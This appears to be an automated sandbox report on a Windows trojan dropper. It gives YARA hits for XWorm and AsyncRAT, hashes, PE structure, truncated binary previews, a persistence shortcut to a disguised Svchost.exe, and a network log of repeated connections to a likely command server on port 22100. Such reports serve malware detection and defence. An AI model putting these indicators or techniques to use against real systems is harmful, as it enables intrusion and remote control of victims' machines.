                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 10%, Browse
                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...".g]....................."....................@..............................................@...............................2.......N...................P.../...........................@......................L........ ..&....................text...P........................... ..`.itext..X........................... ..`.data...lh.......j..................@....bss.....V...........b...................idata...2.......4...b..............@....didata.&.... ......................@....tls....<....0...........................rdata.......@......................@..@.reloc.../...P...0..................@..B.rsrc....N.......N..................@..@....................................@..@........................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 6 07:33:24 2024, mtime=Tue Feb 6 07:33:24 2024, atime=Tue Feb 6 07:33:24 2024, length=36864, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                              Entropy (8bit):4.959171533602536
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:8njC+4optCh/0eda1/obRacgKE/nEjAOqwZk1ngUNwuLxES4t2YZ/elFlSJmkmV:8njc2RmbRXgKwQAOqwZk17REOqygm
                                                                                                                                                                              MD5:3DBA7D47DE032AA3FDDC671CF50B3CEC
                                                                                                                                                                              SHA1:BF88072E19B1FEDA9B7C73FADCC600550EFE4CF8
                                                                                                                                                                              SHA-256:5BD431EEAD7809DAE1B805CDC868757BDE29DE3951FE1431F2F206CEB94EC2B3
                                                                                                                                                                              SHA-512:5A7091C292AEFB511046132CC894A274DA0846C004EA6A4F80B58870E4BB3FAB20D7C67214BC5C652DA3E5C0841A78F3DE1260D175FF2ACFA2B1224B82107FE9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L..................F.... .....]&.X....]&.X....]&.X............................:..DG..Yr?.D..U..k0.&...&.......bBDj...lj[..X..i0.&.X......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGFX)D..........................=...A.p.p.D.a.t.a...B.P.1.....FX&D..Local.<......EWsGFX)D.............................L.o.c.a.l.....N.1.....FX)D..Temp..:......EWsGFX)D.............................T.e.m.p.....b.2.....FX-D .Svchost.exe.H......FX-DFX-D...........................|..S.v.c.h.o.s.t...e.x.e.......[...............-.......Z.............o......C:\Users\user\AppData\Local\Temp\Svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......651689...........hT..CrF.f4... .K.E._c...,...E...hT..CrF.f4... .K.E._c...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                              Entropy (8bit):5.5767765436987435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                              MD5:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                              SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                              SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                              SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........V...N............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.393843540338418
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xl4fiJoH0ncNXiUjt10qTG/gaocYGBoaUMMhA2NX4WABlBuNAMOBSqa:n4vFTMYQUMM6VFYSMU
                                                                                                                                                                              MD5:24DAA3660CF186618750EF08E84EDDF6
                                                                                                                                                                              SHA1:1D5D89CEE862CBACB7091EDF36AF0C8310EA2FAD
                                                                                                                                                                              SHA-256:CFE5E74983F57791C8206AAC4F0709653212123BE80DC2EE86A370B443E57E12
                                                                                                                                                                              SHA-512:4DB24706774D496115FD2965F8598EAF2FB980E22F6B009A37FDA55DA689525A4717F8E4C7F0A4FB404E9EA11115C09F5261ADAA586DC23607B4884BCF0803D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.rt.X................................................................................................................................................................................................................................................................................................................................................d@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.287641041986272
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              File name:SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File size:2'324'480 bytes
                                                                                                                                                                              MD5:8dcbb40394210dc5287028e66fdbf0c7
                                                                                                                                                                              SHA1:eb367c12ee4e8338a891b563f0b19204197c2ab9
                                                                                                                                                                              SHA256:526a3df9f947f4f372d58e8c0065792ab027f06b49fd4f7c705280b199b541a9
                                                                                                                                                                              SHA512:08877c0da26d59ec1c2f33d7c07c13f88604ead5bd010f067fb6c4892791956efe2b9e350e4797d57e499eb5ca1174e982842abd5c4ece402010b21a1eefb77d
                                                                                                                                                                              SSDEEP:24576:rPUo7mlbJzEEKPZdSj1EmP63dOAAD28Uwm76NNrMQyC5O0uuqc4CJqwTz:2zPKZHmy38D9bE0BqwTz
                                                                                                                                                                              TLSH:AAB59884501A2635C01272F40A1FF2BDD38B5D8169519AACE1B8FC5BF43C697EE38B9D
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D..e................................. ........@.. ........................#...........@................................
                                                                                                                                                                              Icon Hash:134544052b964e2d
                                                                                                                                                                              Entrypoint:0x5de68e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x65A98144 [Thu Jan 18 19:51:32 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1de6400x4b.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e00000x5abe4.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x23c0000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x20000x1dc6940x1dc800eef6402bd13b0e48e2049fa886cca513False0.6256655585978489data7.7009507911079IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0x1e00000x5abe40x5ac00e6ea1197538702d40c3777d7d1318ab7False0.03392411329201102data1.6048341827288495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0x23c0000xc0x200924df3d2c0aeebe2aad14bd4a9b1849dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0x1e02200x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.24202127659574468
                                                                                                                                                                              RT_ICON0x1e06880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.13860225140712945
                                                                                                                                                                              RT_ICON0x1e17300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.09533195020746887
                                                                                                                                                                              RT_ICON0x1e3cd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.07575578649031649
                                                                                                                                                                              RT_ICON0x1e7f000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 00.04229267715603928
                                                                                                                                                                              RT_ICON0x1f87280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.022150634671716424
                                                                                                                                                                              RT_GROUP_ICON0x23a7500x5adata0.7333333333333333
                                                                                                                                                                              RT_VERSION0x23a7ac0x24cdata0.46598639455782315
                                                                                                                                                                              RT_MANIFEST0x23a9f80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                                                                                              DLLImport
                                                                                                                                                                              mscoree.dll_CorExeMain
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Feb 6, 2024 09:33:26.921504974 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:26.921555042 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:26.921632051 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:26.944355965 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:26.944399118 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.360228062 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.360313892 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:27.363820076 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:27.363843918 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.364094973 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.411758900 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:27.457736969 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:27.501914024 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.845469952 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.845541000 CET44349705149.154.167.220192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.845599890 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:27.862315893 CET49705443192.168.2.9149.154.167.220
                                                                                                                                                                              Feb 6, 2024 09:33:28.166486025 CET4970622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.375896931 CET2210049706167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.377966881 CET4970622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.425318003 CET4970622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.587222099 CET2210049706167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.588107109 CET4970622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.634758949 CET2210049706167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.646503925 CET4970622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.648844004 CET4970722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.798111916 CET2210049706167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.854295969 CET2210049707167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.854422092 CET4970722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:28.855405092 CET2210049706167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:28.881202936 CET4970722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.060039043 CET2210049707167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.061822891 CET4970722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.086616993 CET2210049707167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.099531889 CET4970722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.102137089 CET4970822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.267239094 CET2210049707167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.305048943 CET2210049707167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.306438923 CET2210049708167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.306524992 CET4970822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.337274075 CET4970822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.510898113 CET2210049708167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.510999918 CET4970822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.541692972 CET2210049708167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.552712917 CET4970822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.554802895 CET4970922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.715220928 CET2210049708167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.756951094 CET2210049708167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.763358116 CET2210049709167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.763454914 CET4970922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.784722090 CET4970922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.972853899 CET2210049709167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:29.972912073 CET4970922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:29.993647099 CET2210049709167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:30.181200027 CET2210049709167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:34.577383041 CET4971022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:34.786952972 CET2210049710167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:34.787125111 CET4971022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:34.830774069 CET4971022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:34.996668100 CET2210049710167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:34.996772051 CET4971022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.040342093 CET2210049710167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.045160055 CET4971022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.051130056 CET4971122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.206259966 CET2210049710167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.254302979 CET2210049710167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.259887934 CET2210049711167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.260004997 CET4971122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.419441938 CET4971122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.469249964 CET2210049711167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.469321012 CET4971122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.521790981 CET4971122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.525772095 CET4971222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.627862930 CET2210049711167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.677458048 CET2210049711167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.730694056 CET2210049711167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.736514091 CET2210049712167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.737004995 CET4971222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.761053085 CET4971222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.954341888 CET2210049712167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:35.954710960 CET4971222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:35.971733093 CET2210049712167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:36.165734053 CET2210049712167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:36.593904018 CET4971322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:36.799556971 CET2210049713167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:36.799628019 CET4971322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:37.005069017 CET2210049713167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:37.005178928 CET4971322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:37.495212078 CET4971322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:37.700725079 CET2210049713167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:41.840131998 CET4971922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.049465895 CET2210049719167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.049549103 CET4971922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.075062990 CET4971922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.258939981 CET2210049719167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.259026051 CET4971922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.284024954 CET2210049719167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.287190914 CET4971922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.288892984 CET4972022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.469721079 CET2210049719167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.496241093 CET2210049719167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.500214100 CET2210049720167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.501096964 CET4972022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.521785975 CET4972022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.712378979 CET2210049720167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.713927031 CET4972022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:42.732764959 CET2210049720167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:42.927761078 CET2210049720167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:46.726351976 CET4972122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:46.941581011 CET2210049721167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:46.941670895 CET4972122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:46.970693111 CET4972122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:47.156987906 CET2210049721167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:47.157134056 CET4972122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:47.185694933 CET2210049721167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:47.193351984 CET4972122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:47.195255995 CET4972222100192.168.2.9167.71.56.116
